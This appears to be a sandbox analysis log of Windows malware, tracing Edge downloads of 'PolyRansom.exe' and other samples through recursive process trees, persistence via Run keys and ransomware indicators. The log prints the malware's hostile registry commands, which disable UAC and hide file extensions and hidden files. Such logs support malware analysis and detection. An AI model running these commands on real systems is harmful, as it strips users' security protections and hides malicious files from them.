PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 688	4264	msedge.exe	101
PID 4264 wrote to memory of 688	4264	msedge.exe	101
PID 4264 wrote to memory of 3476	4264	msedge.exe	102
PID 4264 wrote to memory of 3476	4264	msedge.exe	102
PID 4264 wrote to memory of 3476	4264	msedge.exe	102
PID 4264 wrote to memory of 3476	4264	msedge.exe	102
PID 4264 wrote to memory of 3476	4264	msedge.exe	102
PID 4264 wrote to memory of 3476	4264	msedge.exe	102
PID 4264 wrote to memory of 3476	4264	msedge.exe	102
PID 4264 wrote to memory of 3476	4264	msedge.exe	102
PID 4264 wrote to memory of 3476	4264	msedge.exe	102
PID 4264 wrote to memory of 3476	4264	msedge.exe	102
PID 4264 wrote to memory of 3476	4264	msedge.exe	102
PID 4264 wrote to memory of 3476	4264	msedge.exe	102
PID 4264 wrote to memory of 3476	4264	msedge.exe	102
PID 4264 wrote to memory of 3476	4264	msedge.exe	102
PID 4264 wrote to memory of 3476	4264	msedge.exe	102
PID 4264 wrote to memory of 3476	4264	msedge.exe	102
PID 4264 wrote to memory of 3476	4264	msedge.exe	102
PID 4264 wrote to memory of 3476	4264	msedge.exe	102
PID 4264 wrote to memory of 3476	4264	msedge.exe	102
PID 4264 wrote to memory of 3476	4264	msedge.exe	102

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\95062f159bddce1c47bd708d8d244370_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\95062f159bddce1c47bd708d8d244370_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4856

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4596

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffaedb246f8,0x7ffaedb24708,0x7ffaedb24718
  2⤵
  PID:2524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
  2⤵
  PID:4924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8
  2⤵
  PID:3476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
  2⤵
  PID:3604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
  2⤵
  PID:884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1
  2⤵
  PID:968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
  2⤵
  PID:2804
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:8
  2⤵
  PID:2812
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
  2⤵
  PID:3992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1
  2⤵
  PID:3788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
  2⤵
  PID:1120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
  2⤵
  PID:4872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
  2⤵
  PID:2852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5588 /prefetch:8
  2⤵
  PID:2248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5776 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1
  2⤵
  PID:5312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
  2⤵
  PID:5212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
  2⤵
  PID:5220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6284 /prefetch:1
  2⤵
  PID:5024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6212 /prefetch:8
  2⤵
  PID:4452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
  2⤵
  PID:5312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6312 /prefetch:1
  2⤵
  PID:368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6884 /prefetch:8
  2⤵
  PID:5764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:1
  2⤵
  PID:3868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3196 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5028
- C:\Users\Admin\Downloads\Avoid (1).exe
  "C:\Users\Admin\Downloads\Avoid (1).exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  PID:5032
- C:\Users\Admin\Downloads\Avoid (1).exe
  "C:\Users\Admin\Downloads\Avoid (1).exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  PID:5980
- C:\Users\Admin\Downloads\Avoid (1).exe
  "C:\Users\Admin\Downloads\Avoid (1).exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  PID:4912
- C:\Users\Admin\Downloads\Avoid (1).exe
  "C:\Users\Admin\Downloads\Avoid (1).exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  PID:3788
- C:\Users\Admin\Downloads\Avoid (1).exe
  "C:\Users\Admin\Downloads\Avoid (1).exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  PID:4628
- C:\Users\Admin\Downloads\Avoid (1).exe
  "C:\Users\Admin\Downloads\Avoid (1).exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  PID:5156
- C:\Users\Admin\Downloads\Avoid (1).exe
  "C:\Users\Admin\Downloads\Avoid (1).exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  PID:2496
- C:\Users\Admin\Downloads\Avoid (1).exe
  "C:\Users\Admin\Downloads\Avoid (1).exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  PID:4668
- C:\Users\Admin\Downloads\Avoid (1).exe
  "C:\Users\Admin\Downloads\Avoid (1).exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  PID:6124
- C:\Users\Admin\Downloads\Avoid (1).exe
  "C:\Users\Admin\Downloads\Avoid (1).exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  PID:6068
- C:\Users\Admin\Downloads\Avoid (1).exe
  "C:\Users\Admin\Downloads\Avoid (1).exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  PID:4456
- C:\Users\Admin\Downloads\Avoid (1).exe
  "C:\Users\Admin\Downloads\Avoid (1).exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  PID:4112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1760 /prefetch:1
  2⤵
  PID:4808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6772 /prefetch:1
  2⤵
  PID:2852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1904 /prefetch:1
  2⤵
  PID:5008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2456 /prefetch:8
  2⤵
  PID:5808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6072 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5508
- C:\Users\Admin\Downloads\WindowsUpdate.exe
  "C:\Users\Admin\Downloads\WindowsUpdate.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SendNotifyMessage
  PID:5892
- C:\Users\Admin\Downloads\WindowsUpdate.exe
  "C:\Users\Admin\Downloads\WindowsUpdate.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SendNotifyMessage
  PID:4188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5664 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:1
  2⤵
  PID:5392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6548 /prefetch:8
  2⤵
  PID:5660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5776
- C:\Users\Admin\Downloads\PolyRansom.exe
  "C:\Users\Admin\Downloads\PolyRansom.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  PID:5848
- - C:\Users\Admin\ZScsUgoE\aAIAcUkE.exe
    "C:\Users\Admin\ZScsUgoE\aAIAcUkE.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    PID:5056
- - C:\ProgramData\vQQoAgkY\XCUkkEIA.exe
    "C:\ProgramData\vQQoAgkY\XCUkkEIA.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:5416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4452
  - - C:\Users\Admin\Downloads\PolyRansom.exe
      C:\Users\Admin\Downloads\PolyRansom
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:5408
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:748
      - C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:5660
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5836
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:552
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5092
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        10⤵
        Executes dropped EXE
        
        PID:1628
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        11⤵
        
        PID:3944
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5444
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        13⤵
        
        PID:4524
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        14⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:116
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        15⤵
        
        PID:5984
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:5404
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        15⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:5788
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:3268
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        15⤵
        Modifies registry key
        
        PID:1628
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        15⤵
        UAC bypass
        Modifies registry key
        
        PID:2852
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\scIcIEgU.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        15⤵
        
        PID:2636
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        16⤵
        
        PID:5836
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        13⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:4556
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        13⤵
        Modifies registry key
        
        PID:3856
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        13⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:2628
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vqEwcgMc.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        13⤵
        
        PID:5848
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        14⤵
        
        PID:5092
        
        C:\Windows\SysWOW64\reg.exe
        
